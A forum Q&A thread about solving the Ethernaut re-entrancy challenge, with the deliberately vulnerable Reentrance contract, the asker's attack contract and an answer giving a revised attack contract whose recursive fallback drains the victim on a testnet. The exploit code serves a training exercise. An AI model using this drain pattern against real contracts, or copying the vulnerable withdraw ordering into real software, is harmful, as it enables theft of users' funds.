# Unable to make Re-entrancy attack using solidity code. Ethernaut Openzeppelin

Tags: remix, solidity-0.8.x

This the smart contract and that i was trying to hack. You can find the problem [HERE](https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D)

```
  // SPDX-License-Identifier: MIT
    pragma solidity ^0.6.0;
    
    import '@openzeppelin/contracts/math/SafeMath.sol';
    
    contract Reentrance {
      
      using SafeMath for uint256;
      mapping(address => uint) public balances;
    
      function donate(address _to) public payable {
        balances[_to] = balances[_to].add(msg.value);
      }
    
      function balanceOf(address _who) public view returns (uint balance) {
        return balances[_who];
      }
    
      function withdraw(uint _amount) public {
        if(balances[msg.sender] >= _amount) {
          (bool result,) = msg.sender.call{value:_amount}("");
          if(result) {
            _amount;
          }
          balances[msg.sender] -= _amount;
        }
      }
    
      receive() external payable {}
    }
```

This is my deployed smart contract for the attack

```
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "./Reentrance.sol";

contract attackContract {

  Reentrance public _Reentrance;
  
  constructor(address payable _mainAddress) public payable {
    _Reentrance = Reentrance(_mainAddress);
  }
  function attack() public payable {
    _Reentrance.donate{ value : 3 wei , gas : 40000000}(address(this));
    _Reentrance.withdraw(1 wei);
  }

  fallback() external payable {
    if(address(_Reentrance).balance != 0)
    _Reentrance.withdraw(address(_Reentrance).balance);
  }

}
```

Answer (score 0):

You can find a detailed walkthrough of a solution here: https://medium.com/coinmonks/ethernaut-lvl-10-re-entrancy-walkthrough-how-to-abuse-execution-ordering-and-reproduce-the-dao-7ec88b912c14

Comment: This not the solution or limitaiton of my appraoch and the code has been changed your resource was posted 2018 and its 2022. Visite Here https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D

Answer (score 0):

Remove `gas` from your attack function, and change the `fallback() payable` to `receive() payable`. The contract will work without any errors. Although you have some bugs in your contract. You mentioned in your `fallback()` to withdraw the contract's balance in one call, but the first if will stop the transaction right there, since user's balance cannot be greater than contract's balance (if someone else donated, then this will fail). So correct it and it will work fine.

Comment: I have tried with receive() payable and now i have tried the exact way you described me still its not recreating the re-entrency attack where i did it confirm by remix debug option the code flow is not changing attack to fallback in your sense receive function.

Comment: Are you deploying the attack contract with the right address of your reentrance contract? I used a different one and my contract didn't work.

Comment: Yes, here 0xB4EE0905002Aec659041e9Cea4b8f08E71BF8909 the deployed reentrance contract address which is deployed on rinkeby
https://rinkeby.etherscan.io/address/0xB4EE0905002Aec659041e9Cea4b8f08E71BF8909
this is the problem i am dealing with https://ethernaut.openzeppelin.com/level/0xe6BA07257a9321e755184FB2F995e0600E78c16D

Answer (score 0):

```
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

import "./Reentrance.sol";

contract attackContract {

  Reentrance public _Reentrance;
  
  constructor(address payable _mainAddress) public payable {
    _Reentrance = Reentrance(_mainAddress);
  }

  function deposite() public payable {
    _Reentrance.donate{ value : msg.value}(address(this));
  }

 
  function withdraw() public payable {
    (_Reentrance).withdraw(msg.value);
  }

  fallback() external payable {
    if(address(_Reentrance).balance != 0){
      _Reentrance.withdraw(msg.value);
    } else {
      
    }
  }


}
```

Basically for hacking  the trick lies how much did you deposite  because if the victim smart contract hold 30000000 wei and you deposite 3 wei you cant withdraw more than 3 wei each time. Since we are recreating the re-enterance attack we need to call the withdraw function again and again recursively but this estimated a huge amount of gas fee for all transactions.

So, for draining all the amount just, deposite equal amount as the victim acount hold and call the withdraw function and it will successfully pass the test.

You can compare the error click [HERE](https://rinkeby.etherscan.io/tx/0x09814784b82431958b38f580b20d03e244e1a6c541f58ec608138778133c138e#internal)
Success click [HERE](https://rinkeby.etherscan.io/tx/0xc3cabd28e7ca95ce0639592b4a79719a49a5c0ce1458cbdd94f8aed2cc677c36#internal)